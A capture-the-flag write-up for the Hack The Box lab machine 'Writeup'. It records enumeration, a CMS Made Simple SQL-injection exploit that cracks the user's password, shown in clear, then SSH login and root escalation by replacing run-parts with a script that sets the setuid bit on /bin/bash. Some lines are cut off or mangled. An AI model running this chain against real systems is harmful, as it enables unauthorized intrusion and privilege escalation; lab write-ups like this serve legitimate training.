First of all, we need to enumerate and scan the opened ports. Follow the steps bellow:
#nmap -sV -p- -v 10.10.10.138 -oA nmap
Check the commands used for the initial enumeration:
As we have a open port 80, let's check what service/website is hosted in it.
# echo "10.10.10.138\twriteup.htb" >> /etc/hosts
$ dirb http://writeup.htb/ /usr/share/wordlists/dirb/common.txt > dirb.txt
http://writeup.htb/robots.txt, with a Disalow Role to "writeup" subdir.
http://writeup.htb/writeup/, and use the extension Whappalyzer in GUI, or in CLI mode, we can use the command whatweb like that:
# whatweb http://writeup.htb/writeup/
We need to get a shell access, so lets check some interesting points and find how to exploit it.
# searchsploit "CMS Made Simple"
# ./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
Salt for password found: 5a599ef579066807 | Username found: jkr | Email found: firstname.lastname@example.org | Password found: 62def4866937f08cc13bab43bb14e6f7 | Password cracked: raykayjay9
# ssh email@example.com
$ cat user.txt
We have access to the user shell and we already got the user flag. But we still need to gain root access to catch the root flag.
/usr/local, we can find writable dirs/subdirs to group "staff", that the current user(jkr) is setted too.
/etc/crontab, we can find some rules pointingo to
That way, we can bypass the "run-parts" path to a custom script in
$ echo -e '#!/bin/bash\n\nchmod +s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
$ cat user.txt